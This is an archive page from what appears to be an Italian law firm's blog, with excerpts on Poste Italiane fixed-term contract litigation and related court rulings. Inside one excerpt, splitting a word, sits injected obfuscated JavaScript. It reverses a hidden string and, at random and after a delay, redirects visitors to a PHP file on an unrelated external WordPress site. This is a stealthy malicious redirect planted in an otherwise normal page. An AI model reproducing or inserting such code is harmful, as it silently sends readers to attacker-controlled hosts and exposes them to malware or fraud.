Galleano | Poste Italiane
143
archive,category,category-poste-italiane,category-143,ajax_fade,page_not_loaded,,qode_grid_1200,qode-theme-ver-99.1.1,wpb-js-composer js-comp-ver-5.0.1,vc_responsive

Poste Italiane

La Cassazione rimette alle sezioni unite la questione della compatibilità con la normativa europea della causale finanziaria di Poste. Con un’ordinanza a sorpresa (ma non tanto), depositata il 18 settembre u.s., la Corte di cassazione, dopo una discussione tenuta all’udienza del 4 giugno 2015 dall’avv....

La Cassazione rimette alle sezioni unite la questione della compatibilità con la normativa europea della causale finanziaria di Poste.   Con un’ordinanza a sorpresa (ma non tanto), depositata il 18 settembre u.s., la Corte di cassazione, dopo una discussione tenuta all’udienza del 4 giugno 2015 dall’avv. De...

reiterazione abusiva di contratti a termine e violazione della clausola di contingentamento Cass. 1998/2014 e Corte di appello di Venezia del 19.08.14   Stiamo arriv$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando alla conclusione del contenzioso nazionale sull’art. 2 comma...

– esigenze organizzative – riferimento ad accordi sindacali riguardati ristrutturazione e riallocazione dl personale sul territorio – mancata specificazione dell’esigenza per la stipulazione del contratto a termine - nullità Un numero considerevole di contratti a termine è stato stipulato da Poste italiane spa nell’anno 2002 con riferimento agli accordi sindacali...

– Sentenza 107 del 29.05.13 – la Consulta si adegua alla giurisprudenza di legittimità e rivede la 214/09, ma con qualche precisazione per la Corte di Cassazione E dunque, dopo un parto di più di due mesi, la Corte costituzionale ha depositato la sentenza, decisa in camera di...

depositata la sentenza sul sostitutivo   Il 29 maggio 2013, dopo ben due mesi, è stata depositata la sentenza della Corte costituzionale sull’art. 1 del D.Lgs. 367/2001, esigenze sostitutive ( leggi / scarica ). La sentenza smentisce la sua stessa precedente pronuncia 214/09, convenendo con la Corte di...

o esiti negativi del giudizio con obbligo di restituzione delle somme percepite – contributi previdenziali trattenuti alla fonte – diritto del lavoratore al recupero dei relativi importi – sussiste – Corte appello Firenze 9 aprile 2013 Una delle questioni più ricorrenti nel contenzioso Poste riguarda le posizioni di coloro...

Questione di costituzionalità dell’art. 1 nella parte in cui non prevede l’indicazione del nome del lavoratore sostituito video dell’udienza di discussione del 27.03.2013 Il 27 marzo 2013 si è tenuta l’udienza di discussione della questione di costituzionalità dell’art 1 del D.lgs. 368/2001 nella parte in cui...

obbligo di indicazione del nominativo del lavoratore sostituito – udienza in Corte costituzionale del 27 marzo 2013 – le memorie delle parti Oltre alla questione della scuola, oggetto di altro intervento su questo sito, nel settore pubblico impiego, il 27 marzo 2013, in Corte costituzionale si discute...

Cassazione e Tribunale di Siena   Pare opportuno fare il punto sulla giurisprudenza relativa ai contratti stipulati ex art. 2 comma 1 bis D.Lgs. 368/2001 (cd. “causale finanziaria”). Come si ricorderà, dopo l’Ordinanza della Corte di Giustizia europea nella causa Vino del 11.11.10 [1] e del 22.06.11[2], la...